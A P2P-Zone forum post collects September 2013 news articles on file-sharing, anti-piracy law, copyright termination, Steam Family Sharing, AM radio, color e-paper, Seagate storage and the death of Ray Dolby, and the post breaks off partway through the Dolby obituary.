P2P-Zone  

Go Back   P2P-Zone > Peer to Peer
FAQ Members List Calendar Search Today's Posts Mark Forums Read

Peer to Peer The 3rd millenium technology!

Reply
 
Thread Tools Search this Thread Display Modes
Old 11-09-13, 06:25 AM   #1
JackSpratts
 
JackSpratts's Avatar
 
Join Date: May 2001
Location: New England
Posts: 10,013
Default Peer-To-Peer News - The Week In Review - September 14th, '13

Since 2002


































"We hope that the French court will not order us to build a censorship machine." – Google






































September 14h, 2013




Three-Strikes Laws Do Not Reduce Online Piracy: Study
Juha Saarinen

Copyright infringers seek other tools.

New research from Monash University has found "three strikes" or graduated response laws introduced to reduce internet-borne copyright infringement are by and large ineffective and do not steer users towards legitimate sources of content.

Written by Rebecca Giblin at Monash University's Faculty of Law, the research paper (pdf) found no connection between graduated response regimes and reduced piracy.

"There is no evidence demonstrating a causal connection between graduated response and reduced infringement. If 'effectiveness” means reducing infringement, then it is not effective,' Giblin concluded.

The paper considered graduated response systems in France, New Zealand, Taiwan, South Korea and the UK, all of which have enacted laws that penalise customers in some form, with fines and disconnections, for repeated infringements.

France's HADOPI system, which is currently under review by the new government, appeared to be not very well equipped to identify and process the most egregious repeat offenders, Giblin wrote and has done little to quell piracy in the country.

"... when the data is carefully considered, there is scant evidence that the [HADOPI] law actually reduces infringement," Giblin said.

Acoss the Tasman, research into internet traffic from Waikato University in New Zealand "suggests some ongoing shift in user behavior, and likely some net reduction in infringement," Giblin said. However, the research noted that while the amount of P2P traffic fell, encrypted HTTPS data volumes saw a massive increase.

The Waikato researchers theorised that the increase was caused by a shift towards non-P2P sources of infringing material.

"There is also evidence that the law is driving anti-regulatory activity in New Zealand. Because the NZ scheme applies only to file-sharing via P2P networks, it can be simply bypassed by switching to other tools for infringement," Giblin said.

These tools include Usenet, cyberlockers, VPNs, remote access protocols and so-called seedboxes, which are remote servers hosted on high-speed networks in other jurisdictions, to which users can download content via Bittorrent and then directly access over an encrypted connection.

Neither the Waikato University research nor rights holders' studies that point to infringing file sharing reducing in New Zealand considered the impact of better access to new, legitimate content services.

In South Korea and Taiwan, graduated response systems appear to have had very little if any impact on copyright infringing file sharing, Giblin wrote.

"Although the Taiwanese scheme has now been in operation for several years, there seems to be no evidence in the English language materials that any user has had their access suspended under the law, or any plausible evidence put forward to suggest it has brought about any reduction of infringement," according to Giblin.

However, one positive side-effect of the Taiwanese scheme was that the country was removed from the United States Trade Representative's special watch list, on which nations that do not comply with American intellectual property legislation are noted for possible sanctions.

Overall, Giblin said: "... the above analysis demonstrates, the evidence that graduated response actually reduces infringement is extraordinarily thin."

Giblin also looked into whether graduated response regimes helped steer users away from infringing content sources, towards legimate ones instead. She found no evidence of this in France or Korea however.
http://www.itnews.com.au/News/356360...acy-study.aspx





H33T Is Down: Replacement URL Means Filesharing Site Likely To Return Under New Domain
Thomas Halleck

The popular torrent tracking website H33T.com was taken down on Friday by its domain registrar, apparently due to a court order over a copyright dispute.

Leaseweb, the service provider tasked with hosting the file-sharing community’s domain name, said the site’s domain had been “temporarily” disabled “due to receipt of a court order,” according to P2P news site TorrentFreak. The file-sharing site is down as of Saturday morning EDT, but a replacement URL is live.

Leaseweb is a Norwegian company that manages H33T’s URL, and it appears that a copyright holder requested that the site be disabled for failing to comply with a takedown request. H33T’s administrators originally charged copyright holders $50 to take down a torrent.

The new site -- located at H33T.eu, does not currently have any functionality, other than displaying the following message:

Fake 'GTA 5' PC Torrent Spreads Trojan Virus
Pirate Bay Celebrates 10th Anniversary With New Web Browser
Kickass Torrents
If you are seeing this message then you have found the new .eu domain

The h33t tracker is also online. add the new announce [sic] to your torrents to keep them alive udp://fr33domtracker.h33t.eu:3310/announce

Thank you for your patience, it will be business as usual very shortly, enjoy the h33t


Leaseweb originally hosted file-sharing site Megaupload, run by Kim Dotcom, before being issued a takedown notice and eventually terminating the site. The company has been criticized by Dotcom for eventually wiping MegaUpload data that existed before the site was shut down.

Another popular peer-to-peer torrent site, KickassTorrents (KAT.PH), went down earlier this year following a domain seizure, only to return with a new URL (Kickass.to).
http://www.ibtimes.com/h33t-down-rep...domain-1403365





Italy's New Wave Scene Was the Product of Vintage Filesharing
Daniel Stuckey

I recently watched Joseph Gorden-Levitt's recruitment video for hitRECord—that site of his where writers, artists and 'creatives' upload hours and pages of unfinished content in an attempt to produce collaborative work. Although it feels like a fresh concept, JGL and his brother actually came up with it eight years ago.

But 25 years before that, a counterculture of squatters from northern Italy were making their own crowdsourced art and music projects.

Mutazione, compiled by Alessio Natalizia of WALLS, is a collection of Italy's finest and rarest new wave music from the 80s. Featuring the likes of Doris Norton, whom Apple commissioned to make computer music in 1984, the compilation is like a time capsule with contents that still feel far ahead of their time.

Fed up with the political unrest between the 60s and 80s the artists created a deeply pyschological soundtrack in return. Rioting, street fighting, and political assassination had become common place, Italy's intellectual hubs, Emilia Romagna and Tuscany, were buzzing with activism and this computerized, junkyard soundtrack.

Through vintage forms of social networking and filesharing, a community-collaborative process steered their scene for eight years. In Milan, a collective called TRAX (as explained in the video above), would publish zines and records that predated terms like crowdsourcing, and creative commons, but grasped some similar concepts. For instance, they'd make songs together where the first person recorded a track on a tape, sent the tape to the next collaborator, and so forth.

One of the tracks on the mix, "Niccolai," by Laxative Souls, features samples from a phone call in which a terrorist group gives directions to the location of the body of Aldo Moro, the leader of the Christian Democrats, who was murdered in 1978. Indeed, this compilation isn't contemporary electronic music, but in my opinion, better. These are the lo-fi, retro-future electronic music pioneers, and honestly, contemporary EDM artists will need to learn a thing or two from Mutazione.
http://motherboard.vice.com/blog/ita...ge-filesharing





Netflix Uses Pirate Sites to Determine What Shows to Buy
Ernesto

This week Netflix rolled out its video streaming service in the Netherlands where it hopes to build a massive user base in the years to come. One of the keys to achieve this goal is getting the rights to the most popular movies and TV-shows, and this is where pirate sites come in. Netflix Vice President of Content Acquisition Kelly Merryman says that popularity on file-sharing platforms determines in part what TV-series the company buys.

Video streaming giant Netflix sees itself as one of the most prominent competitors to the many pirate sites that offer video content without owners’ permission.

However, these pirate sites also offer Netflix valuable information as to what video content they should acquire for their service.

This week Netflix rolled out its service in the Netherlands and the company’s Vice President of Content Acquisition, Kelly Merryman, says that their offering is partly based on what shows do well on BitTorrent networks and other pirate sites.

“With the purchase of series, we look at what does well on piracy sites,” Merryman told Tweakers.

One of the shows that Netflix acquired the rights to in the Netherlands is Prison Break, since it is heavily pirated locally. “Prison Break is exceptionally popular on piracy sites,” Merryman says.

In a separate interview Netflix CEO Reed Hastings adds that his company is aware of the many people who download content without permission via torrent sites. However, this is not exclusively a bad thing, as it also creates demand for the content Netflix is offering.

“Certainly there’s some torrenting that goes on, and that’s true around the world, but some of that just creates the demand,” Hastings says.

Eventually these BitTorrent users may want to switch to Netflix as it’s a much better user experience than torrenting, according to the CEO.

“Netflix is so much easier than torrenting. You don’t have to deal with files, you don’t have to download them and move them around. You just click and watch,” Hastings says.

One goal of Netflix is to convert people who currently use pirate sites to get their fix, and there is some evidence that this is indeed happening. According to Hastings, there is evidence that BitTorrent traffic in Canada dropped 50% after Netflix started there three years ago.

The real challenge for the streaming service is to license as much content as they can, which is easier said than done. It might not be a coincidence that “Game of Thrones” is the most pirated TV-show. After all, Netflix wasn’t able to buy the rights from HBO no matter what they offered.
http://torrentfreak.com/netflix-uses...to-buy-130914/





Culture is Not About Aesthetics. Punk Rock is Now Enforced By Law.
David Gerard

Record companies complain the Internet will destroy music. Musicians complain that they can’t make a living any more. The unsympathetic public, feeling the squeeze themselves, tell them to get a proper job.

The problem isn’t piracy — it’s competition.

There is too much music and too many musicians, and the amateurs are often good enough for the public. This is healthy for culture, not so much for aesthetics, and shit for musicians. Musicians in the early ’90s were already feeling the pressure of competition from CD reissues of old stuff; here in the future, you can get almost anything that has ever been digitised for free and listener time is the precious commodity.

There is no shortage of genius works.

As Gwern Branwen notes, culture is not about aesthetics. There are too many brilliant records. There are too many brilliant books. He does the numbers to demonstrate the impossibility of keeping up, and the impossibility of ever having been able to keep up, even back in the twentieth century, when everything was really slow and records cost money.

The purpose of culture is actually social bonding — like you thought all those bad genres you’re not into were — and aesthetics to our level of obsession is just a nice extra along for the ride, and fodder for social signaling (which is why governments spend money on art funding). Culture is everything humans do to interact, and having it go through record companies is actually a completely weird state of affairs.

The problem then is not genius works, but finding, and making, them in your chosen aesthetic vocabulary (the one fixed in a couple of years of your adolescence).

If you’re thinking about money, you’re a small business. You poor bastard.

Economically, the 20th century was just a weird time: where it was possible to mass-produce recordings, but it was difficult and expensive; so we had a record company oligopoly, which is great for squeezing out cash. Now it’s not. Marginal cost approaches zero, and it’s marginal cost, not setup cost, that determines prices. So the price will tend to zero. Microeconomics is a bastard.

In most small businesses, pricing is a percentage whacked onto the marginal cost, and the setup cost is paid for in the percentage. Your setup costs are S (recording, designing the packaging, etc.). You can’t charge the customer upfront for those so you need to whack a percentage margin onto your marginal costs. This is the cost of each additional unit after the setup costs (pressing one more record, shipping one record, etc.), which are M per unit. So your total cost is S plus (M times units), and your return is (M plus percentage) times units.

This works when your marginal costs are large enough to whack a sufficient percentage onto (e.g., a CD) to cover S. It doesn’t when your marginal cost is almost zero (an MP3). Anyone can undercut you by taking a lower percentage on the marginal cost, and if their setup costs are also smaller they’re laughing. Thus, prices tend to drop as close to marginal value as is possible. If that’s zero, that’s what people expect to pay.

(I was actually surprised iTunes works at all, ever, for anyone — people paying $1 for something of zero marginal cost. Every sale is made because the people wanted to pay for the unit in question. Convenience is worth more than I’d thought.)

The market is not perfectly efficient. But the new degree of efficiency is quite horrifying and unexpected to musicians who started out in the gatekeeper oligopoly, and it’s not going to get less efficient.

Literally everyone is a musician if they want to be. Good for culture, bad for employment.

The serious problem for the working musician, though, isn’t records being cheap — it’s competition from other musicians. Because any talentless hack is now a musician. There are bands who would have trouble playing a police siren in tune, who download a cracked copy of Cubase — you know how much musicians pirate their software, VSTs and sample packs, right? — and tap in every note. There are people like me who do this. A two-hundred-quid laptop with LMMS and I suddenly have better studio equipment than I could have hired for $100/hour thirty years ago. You can do better with a proper engineer in a proper studio, but you don’t have to. And whenever quality competes with convenience, convenience wins every time.

You can protest that your music is a finely-prepared steak cooked by sheer genius, and be quite correct in this, and you have trouble paying for your kitchen, your restaurant, your cow. But everyone else is giving away zero-marginal-cost digital steaks, even if they’re actually reconstituted tofu or maybe poop.

This means art becomes entirely a folk enterprise: the sound of the culture talking amongst itself. This is lovely in its way, but all a bit fucked if you aspire to higher quality in your subcultural group.

We’re not going to run out of music, but it’s going to be a bit mediocre by and by.

(Music journalism might become a profession again. I thought it had been safely killed.)

No, I don’t have a quick answer.

Musicians are in competition with every other musician in the world, including literally everyone who wants to be a musician and doesn’t have to do it for money. All of whom have access now to the same outlets and channels the other musicians do. We have the technology; it’s cheap. The amateurs are frequently good enough for the public. The professionals sell fuck-all these days.

For live musicians, you’re in economic competition with every other thing in the world that isn’t going out to see a band — like, ooh, the Internet — and you know the pubs know it.

A few established bands have managed to record albums through Kickstarter-style pledge arrangements: charging directly on the setup cost, not the marginal cost. You do need to have a fanbase to leverage first.

The obvious answer is the destruction of neoliberalism, of bullshit jobs and indeed of the capitalist system in general, and a world where we don’t have to fight in a rat race for scraps from the owners’ tables rather than make music, but that might be a bit complicated to fully outline a viable plan for in a music blog.

Suggestions are welcomed. (I’ll note that “everyone just needs to change their attitude” is unlikely to work in practice.) In the meantime, go buy something from your old favourites, they almost certainly need the cash.

(By the way, this is a problem I personally have: the loved one just quit her job to do art full-time. Here in the future, selling art for money that we seriously need is proving interesting.)
http://rocknerd.co.uk/2013/09/13/cul...forced-by-law/





A Copyright Victory, 35 Years Later
Larry Rohter

In the lucrative world of music copyright, it may be something of a watershed moment: on Friday, after six years of legal wrangling and decades after he wrote the lyrics to the hit song “YMCA,” Victor Willis will gain control of his share of the copyright to that song and others he wrote when he was the lead singer of the 1970s disco group the Village People.

Mr. Willis, who dressed as a policeman during the group’s heyday, was able to recapture those songs, thanks to a little-known provision of copyright legislation that went into effect in 1978. That law granted musicians and songwriters what are known as “termination rights,” allowing them to recover control of their creations after 35 years, even if they had originally signed away their rights.

It is possible, maybe even likely, that other artists who also wrote or recorded songs in 1978 have, after invoking their termination rights, quietly signed new deals with record labels and song publishing companies. But Mr. Willis appears to be the first artist associated with a hit song from that era to announce publicly that he has used his termination rights to regain control of his work.

“YMCA” is one of 33 songs whose copyright Mr. Willis was seeking to recover when he first went to court. Hits like “In the Navy” and “Go West” are part of that group, but another well-known song whose lyrics Mr. Willis wrote, “Macho Man,” was excluded because it was written just before the 1978 law went into effect.

In a telephone interview from his home in Southern California, Mr. Willis said he has not yet decided how best to exploit the song catalog. “I’ve had lots of offers, from record and publishing companies, a lot of stuff, but I haven’t made up my mind how it’s going to be handled.”

He added, however, that he is thinking of prohibiting the Village People — the band still exists and is touring this month and next, though with largely different members — from singing any of his songs, at least in the United States. Under American law, copyright holders have a right to control the performance of a work at any “place open to the public or at a place where a substantial number of persons outside of a normal circle of a family and its social acquaintances are gathered.” This designation applies not only to concert halls, but also to arenas and ballparks like Yankee Stadium, where “YMCA” and other Village People songs are perennial favorites.

“I learned over the years that there are some awesome powers associated with copyright ownership,” Mr. Willis said. “You can stop somebody from performing your music if you want to, and I might object to some usages.”Song publishing and record companies have consistently opposed artists’ efforts to invoke termination rights, which have the potential to affect a company’s bottom line severely. They argue that, in many cases, songs and recordings belong to them in perpetuity, rather than to the artists, because they are “works for hire,” created not by independent contractors but by artists who are, in essence, their employees.

That was initially one of the arguments invoked against Mr. Willis in Federal District Court in Los Angeles. “We hired this guy,” Stewart L. Levy, a lawyer for the companies that controlled the Village People song catalog, said last year. “He was an employee. We gave them the material and a studio to record in and controlled what was recorded, where, what hours and what they did.” Eventually, though, that argument was withdrawn. If the “work for hire” doctrine can’t be made to apply to a prefab group like the Village People, it stands little chance of surviving a test against other artists who emerged in the 1970s and who always had a much greater degree of autonomy, like Bruce Springsteen, the Eagles, Billy Joel and Parliament-Funkadelic.

That does not mean that the litigation over the Village People catalog is over, however. Though Mr. Willis’s songwriting partner Jacques Morali died in 1991, a third name, that of the French record producer Henri Belolo, appears as a co-writer on “YMCA” and other songs, and the distribution of songwriting credits and revenues is now in court.

“The termination is going to occur,” said Jonathan Ross, one of Mr. Willis’s lawyers. “What is in dispute is how much he is getting back, one-half or one-third.”

In an e-mail he sent from Europe, Mr. Levy challenged that interpretation. “Since an appeal of the court’s decision permitting such reversion has yet to be taken, it is far from certain that Mr. Willis will, at the end of the day, ever gain control over any share of the copyrights in the disputed songs.” As a result, he maintained, any “article on his recapture is, therefore, premature and misleading.”

Mr. Willis had declined interview requests during earlier stages of the dispute, but said he decided to speak out now so as to alert other artists, both established and emerging, to protect their copyrights. He said it was only because his wife is a lawyer that he became aware of his termination rights.

“I’m hoping that other artists will get a good lawyer and get back the works that a lot of us gave away when we were younger, before we knew what was going on,” he said. “When you’re young, you just want to get out there and aren’t really paying attention to what’s on paper. I never even read one contract they put in front of me, and that’s a big mistake.”
http://www.nytimes.com/2013/09/11/ar...ars-later.html





Valve announces Steam 'Family Sharing'
Steve Watts

Steam announced a new "Family Sharing" feature today, and is accepting beta applications to test it. When it launches fully, close friends and family will be able to play one another's games, while still earning their own achievements and saving their individual progress through the cloud.

According to Valve's announcement, you'll be able to browse a family member's library and request authorization to download and play the game for yourself. You'll be able to share on up to 10 devices at a time, and sharing access means your partners will be able to look at your entire library. The FAQs do note that technical limitations like a third-party key might not allow for universal sharing, and a shared library can only be accessed by one user at a time.

You can signal your interest by joining the Family Sharing group. The beta will begin in mid-September.

The FAQs also address some nuts and bolts of how it will all work. As the lender, you'll always have access to your games. Playing when a borrower is already playing will give them a few minutes to either purchase it themselves, or quit for the time being. Borrowers will also have access to all of the lender's DLC, but they won't be able to purchase DLC for a game they don't own if the lender doesn't already have it. Region restrictions will remain in place as well, and Valve recommends you only lend to trusted family and friends, since your sharing could be revoked if one of your borrowers cheats with your games.

The feature is especially notable in light of the upcoming Xbox One launch. Family Sharing was one of Microsoft's planned features, but the reversal of its always-online policy meant the sharing feature was lost as well.
http://www.shacknews.com/article/810...family-sharing





A Quest to Save AM Before It’s Lost in the Static
Edward Wyatt

Is anyone out there still listening?

The digital age is killing AM radio, an American institution that brought the nation fireside chats, Casey Kasem’s Top 40 and scratchy broadcasts of the World Series. Long surpassed by FM and more recently cast aside by satellite radio and Pandora, AM is now under siege from a new threat: rising interference from smartphones and consumer electronics that reduce many AM stations to little more than static. Its audience has sunk to historical lows.

But at least one man in Washington is tuning in.

Ajit Pai, the lone Republican on the Federal Communications Commission, is on a personal if quixotic quest to save AM. After a little more than a year in the job, he is urging the F.C.C. to undertake an overhaul of AM radio, which he calls “the audible core of our national culture.” He sees AM — largely the realm of local news, sports, conservative talk and religious broadcasters — as vital in emergencies and in rural areas.

“AM radio is localism, it is community,” Mr. Pai, 40, said in an interview.

AM’s longer wavelength means it can be heard at far greater distances and so in crises, he said, “AM radio is always going to be there.” As an example, he cited Fort Yukon, Alaska, where the AM station KZPA broadcasts inquiries about missing hunters and transmits flood alerts during the annual spring ice breakup.

“When the power goes out, when you can’t get a good cell signal, when the Internet goes down, people turn to battery-powered AM radios to get the information they need,” Mr. Pai said.

He admits to feelings of nostalgia. As the son of Indian immigrants growing up in small-town Parsons, Kan., he listened to his high school basketball team win a 1987 championship, he said. “I sat in my bedroom with my radio tuned into KLKC 1540,” he recalled. On boyhood family road trips across the wide Kansas plains, he said, AM radio “was a constant companion.”

But that was then. In 1978, when Mr. Pai was 5, half of all radio listening was on the AM dial. By 2011 AM listenership had fallen to 15 percent, or an average of 3.1 million people, according to a survey by Veronis Suhler Stevenson, a private investment firm. While the number of FM listeners has declined, too, they still averaged 18 million in 2011. (The figures are averages based on measuring listeners every 15 minutes.)

Although five of the top 10 radio stations in the country, as measured by advertising dollars, are AM — among them WCBS in New York and KFI in Los Angeles — the wealth drops rapidly after that. In 1970 AM accounted for 63 percent of broadcast radio stations, but now it accounts for 21 percent, or 4,900 outlets, according to Arbitron. FM accounts for 44 percent, or 10,200 stations. About 35 percent of stations stream content online.

“With the audience goes the advertising revenues,” said Milford Smith, vice president for radio engineering at Greater Media, which owns 21 stations, three of them AM. “That makes for a double whammy.”

Nearly all English-language AM stations have given up playing music, and even a third of the 30 Major League Baseball teams now broadcast on FM. AM, however, remains the realm of conservative talk radio, including roughly 80 percent of the 600 radio stations that carry Rush Limbaugh. Talk radio has helped keep AM alive.

“If it had to rely on music,” said Michael Harrison, editor and publisher of Talkers magazine, “AM radio would be dead.”

But why try to salvage AM? Critics say its decline is simply natural selection at work, and many now support converting the frequency for use by other wireless technologies. A big sign of AM’s weakness is that one hope for many of its stations may be channeling their broadcasts onto FM.

Not so fast, said Mr. Pai, who has been pushing the F.C.C.’s interim chairwoman, Mignon Clyburn, to put the revitalization of AM high on the agency’s agenda.

“I’m obviously bullish on next-generation technology,” Mr. Pai said. “But I certainly think there continues to be a place for broadcasting and for AM radio.”

Mr. Pai said he was not promoting AM to advance conservative talk radio, but part of his prescription treads a traditional Republican path. He wants to eliminate outdated regulations, for example, like one that requires AM stations to prove that any new equipment decreases interference with other stations, a requirement that is expensive, cumbersome and difficult to meet.

Mr. Pai also wants to examine a relatively new technology known as HD Radio, which has allowed some stations to transmit a digital signal along with their usual analog wave, damping static. (HD Radio is a brand name; it does not stand for high definition, as in HDTV.) But some critics still fault the F.C.C. for allowing too many broadcasters to crowd into a relatively narrow AM band of airwaves.

In the longer term, Mr. Pai said, the F.C.C. could mandate that all AM stations convert to digital transmission to reduce interference. Such a conversion, however, would cost consumers, who would have to replace the hundreds of millions of AM radios that do not capture digital transmissions.

Finally, Mr. Pai wants the F.C.C. to consider what are called FM translators, which send duplicate AM broadcasts over FM airwaves and help to reduce interference. In 2009, the F.C.C. granted permission to AM stations to use such translators.

“Our business has improved rather dramatically” since the conversion to dual bands, said Bud Walters, owner of Cromwell Group, which operates 23 stations in four states, six of them on the AM band and five of which share translators.

The F.C.C. has said it is behind Mr. Pai, although it is a long way from committing to the overhaul he envisions. In August the commission approved a measure requiring the builders of any new radio tower to compensate an AM station if the tower interferes with the station’s broadcast.

Some station owners want more. David Honig, the president of the Minority Media and Telecommunications Council, said that the F.C.C. had before it 37 proposals that would expand opportunities for minority ownership but do not require giving minority-owned radio groups special rights. Two-thirds of minority-owned radio stations broadcast on AM.

The reality, however, is that even if the F.C.C. reduces regulation and provides compensation for AM stations, it cannot repeal the laws of physics.

Nearly every recently manufactured electronic consumer product — not just proliferating smartphones but televisions, home air-conditioning systems, refrigerators, computers and even energy-saving fluorescent light bulbs — emits radio signals that can interfere with AM broadcasts.

The economic boom of the 1980s and 1990s also contributed to the problem with an increase in the construction of tall buildings in suburban areas and beyond, blocking AM signals. Another issue is that the F.C.C. requires most stations to turn off or greatly reduce signals at night, a rule aimed at keeping high-powered AM stations from interfering with smaller local ones.

(The rule, which hardly engenders loyalty among listeners, was adopted because of the way radio waves in the AM frequency travel. Once the sun goes down, AM signals bounce off the ionosphere and reflect back down to earth hundreds of miles from where they originated. That is why listeners of WRDN-AM (1430) in Durand, Wis., for example, on some nights discover they are inadvertently tuned in to a broadcast from St. Louis.)

Mr. Pai said that unless the problems with AM radio were fixed, people would keep fleeing. “There are plenty of other options,” he said. “They will switch the dial to something else.”
http://www.nytimes.com/2013/09/09/us...he-static.html





The OnceBright Future of Color EPaper
Sean Buckley

It's all too easy to dismiss the optimistic fantasies of yesterday: flying cars and robot servants may have filled the pages of Popular Mechanics in the 1950s, but today we're better grounded in reality, pinning our hopes on more reasonable futures based on technology we've actually developed. Still, even those predictions fall flat sometimes, and it can burn to look back at the track record of a horse we once bet on. For this editor, that stallion was known as color e-paper, a series of dimly hued electronic-paper technologies that teased a future of low-power gadgets with beautiful, sunlight-readable matte displays. Prototypes from half a dozen firms exhibited tantalizing potential for the last half of the 2000s, and then promptly vanished as the decade came to a close. Like many ill-conceived futurist predictions, expectations for this technology gently faded from the consumer hive mind.

The legacy of color e-paper may be muted and dim, but its past, at least, is black-and-white: monochrome E Ink set the tone for a decade of reflective, low-power displays. Years before the iPad and other tablets created the so-called third device, sunlight-readable E Ink screens nested into the public consciousness with Amazon's inaugural Kindle. Launched in 2007, it was a blocky, expensive and awkward device that had more potential than practical application, but the visibility of the Amazon brand lifted its stature. Consumers paid attention and the e-reader category was forged.

Naturally, it didn't take long for consumers to want more -- sure, a sunlight-readable display that lasted for days on a single charge was great, but what about color? This, too, was in the works for a few years, but progress was slow. Early prototypes from Fujitsu did a decent job of mirroring their monochrome cousins' modest power consumption, but images often appeared washed out and faded, like a newspaper left in the sun too long. The technology failed to beat the next Kindle to market, but improved as the years went on. In the meantime, Barnes & Noble added a splash of color to the e-reader market by attaching a secondary, peripheral LCD display to its Nook e-reader -- providing a vibrant and active navigation hub under its reading surface.

The race to create a consumer-ready color e-paper display heated up as Barnes & Noble, Sony and Amazon fought over market share -- if electronic reading devices were to be the next big thing, then surely color would be the category's killer feature. Companies like Samsung, Bridgestone, E Ink (then known as PVI), Fujitsu, Qualcomm, Philips and Plastic Logic spent the better parts of 2009 and 2010 teasing us with brighter screens, faster refresh rates and flexible-display technology.

Despite the excitement surrounding color e-paper, however, few firms were actually ready to put their cards on the table. In early 2010, Amazon CEO Jeff Bezos dispelled rumors of an incoming Kindle Color, saying that current prototypes were simply "not ready for prime-time production," based on what he'd seen in the company's labs. Sony also dodged the subject, committing itself to its existing line of monochrome e-readers until higher-quality panels were available. Even the companies behind the technology openly admitted that it wasn't ready -- PVI and Qualcomm both delayed their respective E Ink Triton and Mirasol color displays, independently describing them as unsatisfactory. Worse still was the high cost of color e-paper development, which drove Samsung to back out of the industry in 2010.

Unfortunately, the delays didn't stave off consumer demand for a color reading device, and it came to market through the path of least resistance: the LCD. This veteran technology may not have been able to compete with color e-paper in the arenas of power consumption or visibility in direct sunlight, but it made up for these faults with bright, accurate color reproduction and the ability to play back video content. More importantly, the technology was available, and the growing tablet market soon offered a ready alternative to the developing color e-paper technology. Companies betting on color e-paper were soon forced to re-evaluate their strategies, Qualcomm told Engadget back at SID 2011, citing Apple's inaugural tablet as the catalyst for its partners' reconsideration.

The original iPad didn't kill the color e-reader independently, of course -- the device was simply too large and too expensive to scratch the itch for every digital-reading enthusiast with an eye for color. Barnes & Noble's first full-color e-reader didn't have these problems. Launched in late 2010 for $250, the 7-inch Nook Color was the right device at the right time, introducing an affordable color reading device while simultaneously giving the bookseller an edge in the growing e-reader market. It didn't take long for Amazon to react to the positive consumer response, launching its own LCD color e-reader, the Kindle Fire, for a scant $200 the following year. The color e-paper offerings of the same era just couldn't compete -- Kyobo's $310 Mirasol eReader was panned for having poor battery life and unstable software, and an E Ink Triton device by Hanvon priced itself out of the market with a staggering $530 sticker. What's worse, consumers didn't even seem to know these products existed. The damage was done; the category's biggest brands knew they could create a successful color e-reader without next-generation e-paper. By the time ASUS and Google trumped the Kindle Fire with the Nexus 7, the technology was all but forgotten.

Color e-paper may have faded from the public consciousness after media tablets usurped its role in the consumer electronics space, but the technology itself lives on, albeit dimly. PVI, a company so dedicated to reflective-display technology that it changed its name to E Ink Holdings Incorporated, refocused its efforts on new markets, creating programmable supermarket price tags and digital billboards for European firms. It's even limping along in the color e-reader space, although we wouldn't call it a major player -- the most recent device to sport the company's Triton color E Ink display, the Jetbook, sells for an astounding $500. Hardly priced to sell, but the company tells us that it has seen some success in European classrooms. Despite these efforts, the company isn't exactly shining: in its Q2 2013 financial report, E Ink posted a $33.6 million loss -- its biggest in four years. Citing numbers from IHS, the report optimistically looked to Western European purchasing trends to cushion the blow, but more telling are the losses suffered in North America, which is now exhibiting a 15 percent loss in worldwide e-reader shipments when compared to 2011. The devices just aren't selling as fast as they used to.

Other companies are sending mixed messages. Qualcomm's Mirasol technology shipped in precious few devices before the company put a lid on production last summer, yet it continues to demonstrate new and intriguing prototypes. At SID 2013, for instance, the company trotted out a smartphone with a reflective 5.1-inch, 2,560 x 1,440 display and a 1.5-inch smartwatch, teasing a future of color e-paper-equipped hardware. The company was quick to point out that the devices were mere mock-ups, but a similar watch surfaced at the company's Uplinq developer conference earlier this week, taking the name of Toq. The smartphone display is still missing in action, however, and Qualcomm says it'll need a few more years in R&D before it's ready for market. When we asked the company if it was still developing screens for color digital readers, Qualcomm representatives could only tell us that they had nothing new to announce. Clearly the company's Mirasol technology is still moving forward, but the firm seems focused on smaller devices.

Amazon's recent Liquavista acquisition raises even more questions: if the iPad, Kindle Fire and Nook Color sealed the fate of color e-paper years ago, why did one of the industry's biggest e-reader manufacturers purchase a company known for low-power color displays? Reaching out directly for an answer proved futile for Engadget -- the company won't budge on the future of color e-paper or Amazon's intentions for the next-generation Kindle device.

Hushed acquisitions and quiet color-display advancements aren't enough to save color e-paper, however. More daunting than the display category's technological hurdles are the commercial roadblocks in its path: consumers are simply losing interest in the e-reader category as a whole. That certainly isn't to say that it's a dead or dying market, but it's slowly trending toward the niche. According to an IDC forecast released in March, e-reader shipments fell by a staggering 31 percent in a single year -- peaking at 26.4 million in 2011 and dropping to 18.2 million in 2012. At the same time, tablet sales have increased by about 11 percent, with about half of all devices sold falling into an e-reader-competitive form factor, measuring eight inches or smaller. Worse still, these numbers are for traditional monochrome e-readers, not the hopeful color models that failed to take flight.

The Kindle brand and its sunlight-readable e-paper display probably aren't going anywhere, but the category is edging away from the mainstream. Users demand more out of their devices these days, and slow-refreshing E Ink just can't cut it for a media tablet. If our predictions for the future need to be grounded in reality, then maybe it's time we finally put our color e-reader dreams to bed. The technology may eventually find a home somewhere, but at this rate, it likely won't be on our nightstand.
http://www.engadget.com/2013/09/05/t...color-e-paper/





Seagate's Shingled Magnetic Recording Tech Layers Tracks to Boost Bit Densities
Geoff Gasior

Since about 2006, hard drives have used perpendicular recording technology to store data. That method has enabled platter densities up to 1TB and drives as large as 4TB. Perpendicular recording is starting to bump into physical limits, though. Seagate says the read and write components of current technology can't get any smaller. Neither can the associated drive tracks, which are down to 75 nanometers in width.

According to the firm, a new approach is needed if areal densities are to continue their upward trajectory. That new approach is called Shingled Magnetic Recording, or SMR.

Shingled recording preserves the perpendicular bit orientation of its predecessor. However, it fundamentally changes the way in which those bits are organized. Instead of arranging individual tracks with space in between, shingled recording lays tracks on top of each other in a staggered fashion—much like the shingles on a roof.

As the diagram illustrates, the read head is much narrower than the write head. This size difference allows the tracks to overlap without affecting the drive's ability to read the data. The overlap poses a problem when data is rewritten, though. Because the write head covers the read portion of the next track, that data has to be "picked up" before the rewrite can occur. The displaced data then needs to be written back to its original location, displacing the data in the following track. And so on.

To prevent rewrites from cascading down too many tracks, Seagate arranges the tracks into bands. The precise layout of these bands will be different depending on the drive's target application. Increasing the number of tracks per band will raise the storage density, but it will also slow rewrite performance.

Seagate says it's already shipping drives with SMR technology, though the first product isn't set to debut until next year. That drive promises a 25% increase in storage density: 1.25TB per platter and up to 5TB per drive.

SMR looks like a clever technology, and I'm eager to test the first drives based on it. That said, Seagate needs a better promo video. This short introduction has nothing on HGST's classic Get Perpendicular clip.

Seagate will also have to convince folks that SMR is worth the rewrite penalty. That might be an easier task than topping a disco-infused technology demonstration. SSDs have long since replaced mechanical drives as the go-to solution for high-performance PC storage, relegating HDDs to secondary and high-density storage. SMR's benefits may outweigh the penalty for those applications.
http://techreport.com/news/25334/sea...-bit-densities





Ray Dolby, Who Put Moviegoers in the Middle, Is Dead at 80
Natasha Singer

Ray Dolby, the sound pioneer who founded Dolby Laboratories, revolutionized the recording industry with the invention of the Dolby noise-reduction system, and transformed cinema and home entertainment with the development of Dolby digital surround sound, died on Thursday at his home in San Francisco. He was 80.

He developed Alzheimer’s disease several years ago and last July received a diagnosis of acute leukemia, according to a company statement.

